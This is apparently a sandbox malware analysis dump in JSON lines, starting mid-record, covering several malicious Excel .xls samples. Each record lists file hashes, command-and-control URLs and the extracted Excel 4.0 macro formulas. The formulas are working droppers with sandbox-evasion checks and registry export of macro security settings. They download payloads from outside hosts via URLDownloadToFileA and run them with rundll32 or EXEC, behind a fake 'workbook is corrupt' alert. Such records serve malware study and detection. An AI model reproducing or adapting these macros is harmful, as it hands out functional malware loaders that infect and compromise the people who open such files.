CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rQdsT3J6fE\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2f13354a41424cbaea8ff098e8dde5f741b02acf42a5986c6a94f5efcac62b02"},"analysis":{"reported":"2020-04-09T16:15:35Z","score":10},"files":[{"filename":"2f13354a41424cbaea8ff098e8dde5f741b02acf42a5986c6a94f5efcac62b02","filesize":167936,"md5":"5e74a5e85d55e8c75900229c767d6fa3","sha1":"2558879ba9beb2fe09be393414663e5cd20fefce","sha256":"2f13354a41424cbaea8ff098e8dde5f741b02acf42a5986c6a94f5efcac62b02","sha512":"e028733b98654067072a872ba9c3bd3e8da4f951cf40a04c927c3bc7a471776307bfdf4de0d02efb5d816de7f25a01ebda6241bfd74084598f2b187be97a9871","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2f13354a41424cbaea8ff098e8dde5f741b02acf42a5986c6a94f5efcac62b02.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fMa4dcuXOI\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2f287a26eab4d96d6be641b9b622c03dc24e1e500d6edc7f1d76d2ac7229b47d"},"analysis":{"reported":"2020-04-09T16:15:35Z","score":10},"files":[{"filename":"2f287a26eab4d96d6be641b9b622c03dc24e1e500d6edc7f1d76d2ac7229b47d","filesize":212992,"md5":"8ad48246da67239ec831ebc6efe7adba","sha1":"24fc7f56d765a00306331d897f4aae59a4fb9e52","sha256":"2f287a26eab4d96d6be641b9b622c03dc24e1e500d6edc7f1d76d2ac7229b47d","sha512":"eb38284703bf14d1c1d99eeae04d7aedb49a60ea3cb44ae584085b803cd2cea738ad974905996ccdc636f5448fb5c7b50745f507238fd6d71fdc7b42f76b066b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2f287a26eab4d96d6be641b9b622c03dc24e1e500d6edc7f1d76d2ac7229b47d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5ATqhg28tm\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2f28b4fa4a3ea1876439fb074925db4debd316566c4bc28f57ab57c1313f46d7"},"analysis":{"reported":"2020-04-09T16:15:35Z","score":10},"files":[{"filename":"2f28b4fa4a3ea1876439fb074925db4debd316566c4bc28f57ab57c1313f46d7","filesize":177152,"md5":"9498cf56908c13dbfea0403a79c375e6","sha1":"70937260c87d55feba6205d51036df42890b1760","sha256":"2f28b4fa4a3ea1876439fb074925db4debd316566c4bc28f57ab57c1313f46d7","sha512":"ccf52d28093c1e2d358799f244050336f4d4044ee4d1b3980bdc550e448061b4c3acaa0277884eaa8e523660782fb7e54544eedbac7e17b9247dda2ddb8dd3a3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2f28b4fa4a3ea1876439fb074925db4debd316566c4bc28f57ab57c1313f46d7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Y2TKpCgjQF\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2f2bb6df4ed93921c42933053769d16e49246b19a0eea651d80c7646b713abfc"},"analysis":{"reported":"2020-04-09T16:15:35Z","score":10},"files":[{"filename":"2f2bb6df4ed93921c42933053769d16e49246b19a0eea651d80c7646b713abfc","filesize":113664,"md5":"bce4e9abd5f55cfec53e4976ee77e78b","sha1":"c8d55d35274d15eae1d9cf7624c45c3820617e3b","sha256":"2f2bb6df4ed93921c42933053769d16e49246b19a0eea651d80c7646b713abfc","sha512":"53ae0c22079f74c0461ca395d722dd47cf0901272f250167fb536d5f118124def885fe6e79c69f403e6ddf8c9010d5dc813df7fd90da3d8e8f5d8738cb24ddd3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2f2bb6df4ed93921c42933053769d16e49246b19a0eea651d80c7646b713abfc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"JOF909JCXx\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2f34bccf540bbbc02e62606bd0addd442cadbdd662f097060cc00e9e3e9a6ea7"},"analysis":{"reported":"2020-04-09T16:15:35Z","score":10},"files":[{"filename":"2f34bccf540bbbc02e62606bd0addd442cadbdd662f097060cc00e9e3e9a6ea7","filesize":221184,"md5":"20785f598f40a0293bcc6199dcfe7f78","sha1":"dcf4d0d58644e22d659392baff13b90885bbf20b","sha256":"2f34bccf540bbbc02e62606bd0addd442cadbdd662f097060cc00e9e3e9a6ea7","sha512":"4f91ff22e086ca3102fd15abd540aae4f64f123f92ac9b6eff93ca79c7a91842a825d877accd166ba5ef05dfdd04ff7eb3a84226101e8aaa34adead6d1069413","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2f34bccf540bbbc02e62606bd0addd442cadbdd662f097060cc00e9e3e9a6ea7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xHsNv85eX1\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2f3b719303b022b604b8ce8724241c4eec70491d09b8ffb4c7c2ed9ad2c0ebc2"},"analysis":{"reported":"2020-04-09T16:15:35Z","score":10},"files":[{"filename":"2f3b719303b022b604b8ce8724241c4eec70491d09b8ffb4c7c2ed9ad2c0ebc2","filesize":168448,"md5":"3b92b67839f46c72041b95d32447d3dc","sha1":"ec73eb55dc782a35078f62f6b4f5c7c2b7d3f031","sha256":"2f3b719303b022b604b8ce8724241c4eec70491d09b8ffb4c7c2ed9ad2c0ebc2","sha512":"41ab8e9d3fa66e0bd1b2e5947a9061092517c01c7411bd3ad1c58be9ab16396ea5e7dab0cfa39c68c1cf5c1398f9a87dafb274a088b5822961c9d1421708ec24","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2f3b719303b022b604b8ce8724241c4eec70491d09b8ffb4c7c2ed9ad2c0ebc2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"aX8pM3oPUQ\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2f4ad83ca218a98b46af9613a0a344d9300f51d880032e96946b4b8b10e8da70"},"analysis":{"reported":"2020-04-09T16:15:35Z","score":10},"files":[{"filename":"2f4ad83ca218a98b46af9613a0a344d9300f51d880032e96946b4b8b10e8da70","filesize":185344,"md5":"70eb979f6270d09ae212676d25ebf3c3","sha1":"7d6a0317816c66a08eeb5841d02296769d0c3bd8","sha256":"2f4ad83ca218a98b46af9613a0a344d9300f51d880032e96946b4b8b10e8da70","sha512":"522032f98275b5a3764cffb91bc64429a6b32250f72471e3d5e8fe837d3e3a661638e76b0fd958eb1a10fc2d40c9fd379fd2062e2d59a125f72a1c8315e710c8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2f4ad83ca218a98b46af9613a0a344d9300f51d880032e96946b4b8b10e8da70.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2f54900410b9f0adfdebfdd8e7aa5f225458ddae3c8c6f99ab3c7628fb38a60e"},"analysis":{"reported":"2020-04-09T16:15:35Z","score":10},"files":[{"filename":"2f54900410b9f0adfdebfdd8e7aa5f225458ddae3c8c6f99ab3c7628fb38a60e","filesize":112128,"md5":"30beff7bf77cf0beb820395c3c938d8c","sha1":"be653685f4f1c0162a8c20c1a00454448ec99283","sha256":"2f54900410b9f0adfdebfdd8e7aa5f225458ddae3c8c6f99ab3c7628fb38a60e","sha512":"bc679a248050fda8008963514455b3f73e0af19c856943fe109107c470fb7f5006a122e783894e1dcbc715e5b1cdfe40660d89435374f172188a233c72251506","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2f54900410b9f0adfdebfdd8e7aa5f225458ddae3c8c6f99ab3c7628fb38a60e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2f632c16a0cab043071b39338c04cdf8db461e078861daa402c7d683dff3b2d9"},"analysis":{"reported":"2020-04-09T16:15:35Z","score":10},"files":[{"filename":"2f632c16a0cab043071b39338c04cdf8db461e078861daa402c7d683dff3b2d9","filesize":185344,"md5":"6cec84ba88f355e41f8b15b89b66c4a9","sha1":"cab122b2f3fb3a3db530a93852b5943e72227ac5","sha256":"2f632c16a0cab043071b39338c04cdf8db461e078861daa402c7d683dff3b2d9","sha512":"1450af3401ccee0095d335e77c26db392fbaa4ac17a6d6cc6cd298f453cb789b5a85221f5dbda94a537ceabec965f056e199a49d8e9b45ee06d85e6393e05764","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2f632c16a0cab043071b39338c04cdf8db461e078861daa402c7d683dff3b2d9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2f637ae77efa9d7f79053662caf9a200a987ef0960a4509ca628cd0d9162a290"},"analysis":{"reported":"2020-04-09T16:15:35Z","score":10},"files":[{"filename":"2f637ae77efa9d7f79053662caf9a200a987ef0960a4509ca628cd0d9162a290","filesize":171008,"md5":"b4d01d7321f6185f75a5541a2fbb0372","sha1":"d6a4073f5e0e1d12cab45edea99164e03d8ada09","sha256":"2f637ae77efa9d7f79053662caf9a200a987ef0960a4509ca628cd0d9162a290","sha512":"e5ab888be1c076ee4eb408cd41db5da32b43ff013c15e7d7357aa2ea6e7573632fbb49fa3922ff441a3c15741fff4a88789942adcff19a56247ce54db3a5fdba","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2f637ae77efa9d7f79053662caf9a200a987ef0960a4509ca628cd0d9162a290.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6XrccNdQOj\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2f65020a2b03627359c352638f41e2b083aeaf33d0863c1e9446aa5c79f5b9cf"},"analysis":{"reported":"2020-04-09T16:15:35Z","score":10},"files":[{"filename":"2f65020a2b03627359c352638f41e2b083aeaf33d0863c1e9446aa5c79f5b9cf","filesize":113664,"md5":"b4f2177688bfa9c61d874f1b6e159fb4","sha1":"2c5811e5565f947933181c38e5d8afe38115ac57","sha256":"2f65020a2b03627359c352638f41e2b083aeaf33d0863c1e9446aa5c79f5b9cf","sha512":"b134f6da7cfa9efa1a150910f68c8480b0cf5d8f4b285d8c8bdf196a57ec2264ded58d24f14e3ebd1f83afeee6688481d773ece57e80086b4d3f2f25e103b37d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2f65020a2b03627359c352638f41e2b083aeaf33d0863c1e9446aa5c79f5b9cf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"ddo9ANXyNq\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2f6bcb9fd7f75eb31b1370f47e1b66c2efa3a9fbaed610300175fe747bd29d03"},"analysis":{"reported":"2020-04-09T16:15:35Z","score":10},"files":[{"filename":"2f6bcb9fd7f75eb31b1370f47e1b66c2efa3a9fbaed610300175fe747bd29d03","filesize":168448,"md5":"b0a2bde7023c9ea59a5deb022476d0e4","sha1":"d8a37af2be05185aa57e3b3e52ed684d5e1ac6ca","sha256":"2f6bcb9fd7f75eb31b1370f47e1b66c2efa3a9fbaed610300175fe747bd29d03","sha512":"9a1721134344c6fc89ff1ef04ed07e364b5063d7df666cd4f50db5b3506cecf5d0b60c4058bc005d134a9cb88118fcdd7810538b1cac39023934305aab8ba794","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2f6bcb9fd7f75eb31b1370f47e1b66c2efa3a9fbaed610300175fe747bd29d03.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"9oPCrS4Eco\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2f81a42b13623f9d9187841ea6b3367403ae348a064528471835647864f22ad7"},"analysis":{"reported":"2020-04-09T16:15:35Z","score":10},"files":[{"filename":"2f81a42b13623f9d9187841ea6b3367403ae348a064528471835647864f22ad7","filesize":167936,"md5":"757e90e3329afd62cce4c6444aceafce","sha1":"e88c9dfeb31964f7f624983dc886cc7967263f6b","sha256":"2f81a42b13623f9d9187841ea6b3367403ae348a064528471835647864f22ad7","sha512":"1e743446fc39ff7d1d40327d993dab4e7613d339c8a0c8d4924d2342dd34cf04e82d3de40d10c5093507eb775b0d5e7d446a343a8dffa934cd48034405cb012d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2f81a42b13623f9d9187841ea6b3367403ae348a064528471835647864f22ad7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"XNajTfZDhB\",TRUE)\nGOTO(R$0C$19)"}}}]}
